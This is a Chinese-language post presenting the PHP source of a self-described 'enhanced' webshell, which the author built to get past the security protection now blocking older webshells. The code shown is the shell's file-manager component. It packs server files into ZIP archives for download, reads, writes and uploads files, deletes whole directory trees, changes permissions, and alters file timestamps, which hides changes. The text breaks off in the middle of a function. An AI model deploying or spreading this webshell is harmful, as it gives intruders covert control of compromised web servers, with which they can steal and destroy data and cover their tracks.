因为之前使用的webshell大马很多都没用了,都被安全防护拦截了,所以通过几个大牛的指点和网上的教程整理而成自己做的增强版的webshell大马,我这个是源码,部分无加密!
\*{padding:0; margin:0;} body{background:threedface;font-family:"Verdana", "Tahoma", "宋体",sans-serif; font-size:13px;margin-top:3px;margin-bottom:3px;table-layout:fixed;word-break:break-all;} a{color:#000000;text-decoration:none;} a:hover{background:#BBBBBB;} table{color:#000000;font-family:"Verdana", "Tahoma", "宋体",sans-serif;font-size:13px;border:1px solid #999999;} td{background:#F9F6F4;} .toptd{background:threedface; width:310px; border-color:#FFFFFF #999999 #999999 #FFFFFF; border-style:solid;border-width:1px;} .msgbox{background:#FFFFE0;color:#FF0000;height:25px;font-size:12px;border:1px solid #999999;text-align:center;padding:3px;clear:both;} .actall{background:#F9F6F4;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;} \\n END; return false; } //文件管理 class packdir { var $out = ''; var $datasec = array(); var $ctrl\_dir = array(); var $eof\_ctrl\_dir = "\\x50\\x4b\\x05\\x06\\x00\\x00\\x00\\x00"; var $old\_offset = 0; function packdir($array) { if(@function\_exists('gzcompress')) { for($n = 0;$n < count($array);$n++) { $array\[$n\] = urldecode($array\[$n\]); $fp = @fopen($array\[$n\], 'r'); $filecode = @fread($fp, @filesize($array\[$n\])); @fclose($fp); $this -> filezip($filecode,basename($array\[$n\])); } @closedir($zhizhen); $this->out = $this->packfile(); return true; } return false; } function at($atunix = 0) { $unixarr = ($atunix == 0) ? getdate() : getdate($atunix); if ($unixarr\['year'\] < 1980) { $unixarr\['year'\] = 1980; $unixarr\['mon'\] = 1; $unixarr\['mday'\] = 1; $unixarr\['hours'\] = 0; $unixarr\['minutes'\] = 0; $unixarr\['seconds'\] = 0; } return (($unixarr\['year'\] - 1980) << 25) | ($unixarr\['mon'\] << 21) | ($unixarr\['mday'\] << 16) | ($unixarr\['hours'\] << 11) | ($unixarr\['minutes'\] << 5) | ($unixarr\['seconds'\] >> 1); } function filezip($data, $name, $time = 0) { $name = str\_replace('\\\\', '/', $name); $dtime = dechex($this->at($time)); $hexdtime = '\\x'.$dtime\[6\].$dtime\[7\].'\\x'.$dtime\[4\].$dtime\[5\].'\\x'.$dtime\[2\].$dtime\[3\].'\\x'.$dtime\[0\].$dtime\[1\]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "\\x50\\x4b\\x03\\x04"; $fr .= "\\x14\\x00"; $fr .= "\\x00\\x00"; $fr .= "\\x08\\x00"; $fr .= $hexdtime; $unc\_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $c\_len = strlen($zdata); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $fr .= pack('V', $crc); $fr .= pack('V', $c\_len); $fr .= pack('V', $unc\_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $fr .= pack('V', $crc); $fr .= pack('V', $c\_len); $fr .= pack('V', $unc\_len); $this -> datasec\[\] = $fr; $new\_offset = strlen(implode('', $this->datasec)); $cdrec = "\\x50\\x4b\\x01\\x02"; $cdrec .= "\\x00\\x00"; $cdrec .= "\\x14\\x00"; $cdrec .= "\\x00\\x00"; $cdrec .= "\\x08\\x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c\_len); $cdrec .= pack('V', $unc\_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old\_offset ); $this -> old\_offset = $new\_offset; $cdrec .= $name; $this -> ctrl\_dir\[\] = $cdrec; } function packfile() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl\_dir); return $data.$ctrldir.$this -> eof\_ctrl\_dir.pack('v', sizeof($this -> ctrl\_dir)).pack('v', sizeof($this -> ctrl\_dir)).pack('V', strlen($ctrldir)).pack('V', strlen($data))."\\x00\\x00"; } } function File\_Str($string) { return str\_replace('//','/',str\_replace('\\\\','/',$string)); } function File\_Size($size) { if($size > 1073741824) $size = round($size / 1073741824 \* 100) / 100 . ' G'; elseif($size > 1048576) $size = round($size / 1048576 \* 100) / 100 . ' M'; elseif($size > 1024) $size = round($size / 1024 \* 100) / 100 . ' K'; else $size = $size . ' B'; return $size; } function File\_Mode() { $RealPath = realpath('./'); $SelfPath = $\_SERVER\['PHP\_SELF'\]; $SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/')); return File\_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath))); } function File\_Read($filename) { $handle = @fopen($filename,"rb"); $filecode = @fread($handle,@filesize($filename)); @fclose($handle); return $filecode; } function File\_Write($filename,$filecode,$filemode) { $key = true; $handle = @fopen($filename,$filemode); if(!@fwrite($handle,$filecode)) { @chmod($filename,0666); $key = @fwrite($handle,$filecode) ? true : false; } @fclose($handle); return $key; } function File\_Up($filea,$fileb) { $key = @copy($filea,$fileb) ? true : false; if(!$key) $key = @move\_uploaded\_file($filea,$fileb) ? true : false; return $key; } function File\_Down($filename) { if(!file\_exists($filename)) return false; $filedown = basename($filename); $array = explode('.', $filedown); $arrayend = array\_pop($array); header('Content-type: application/x-'.$arrayend); header('Content-Disposition: attachment; filename='.$filedown); header('Content-Length: '.filesize($filename)); @readfile($filename); exit; } function File\_Deltree($deldir) { if(($mydir = @opendir($deldir)) == NULL) return false; while(false !== ($file = @readdir($mydir))) { $name = File\_Str($deldir.'/'.$file); if((is\_dir($name)) && ($file!='.') && ($file!='..')){@chmod($name,0777);File\_Deltree($name);} if(is\_file($name)){@chmod($name,0777);@unlink($name);} } @closedir($mydir); @chmod($deldir,0777); return @rmdir($deldir) ? true : false; } function File\_Act($array,$actall,$inver) { if(($count = count($array)) == 0) return '请选择文件'; if($actall == 'e') { $zip = new packdir; if($zip->packdir($array)){$spider = $zip->out;header("Content-type: application/unknown");header("Accept-Ranges: bytes");header("Content-length: ".strlen($spider));header("Content-disposition: attachment; filename=".$inver.";");echo $spider;exit;} return '打包所选文件失败'; } $i = 0; while($i < $count) { $array\[$i\] = urldecode($array\[$i\]); switch($actall) { case "a" : $inver = urldecode($inver); if(!is\_dir($inver)) return '路径错误'; $filename = array\_pop(explode('/',$array\[$i\])); @copy($array\[$i\],File\_Str($inver.'/'.$filename)); $msg = '复制到'.$inver.'目录'; break; case "b" : if(!@unlink($array\[$i\])){@chmod($filename,0666);@unlink($array\[$i\]);} $msg = '删除'; break; case "c" : if(!eregi("^\[0-7\]{4}$",$inver)) return '属性值错误'; $newmode = base\_convert($inver,8,10); @chmod($array\[$i\],$newmode); $msg = '属性修改为'.$inver; break; case "d" : @touch($array\[$i\],strtotime($inver)); $msg = '修改时间为'.$inver; break; } $i++; } return '所选文件'.$msg.'完毕'; } function File\_Edit($filepath,$filename,$dim = '') { $THIS\_DIR = urlencode($filepath); $THIS\_FILE = File\_Str($filepath.'/'.$filename); if(file\_exists($THIS\_FILE)){$FILE\_TIME = @date('Y-m-d H:i:s',filemtime($THIS\_FILE));$FILE\_CODE = htmlspecialchars(File\_Read($THIS\_FILE));} else {$FILE\_TIME = @date('Y-m-d H:i:s',time());$FILE\_CODE = '';} print<<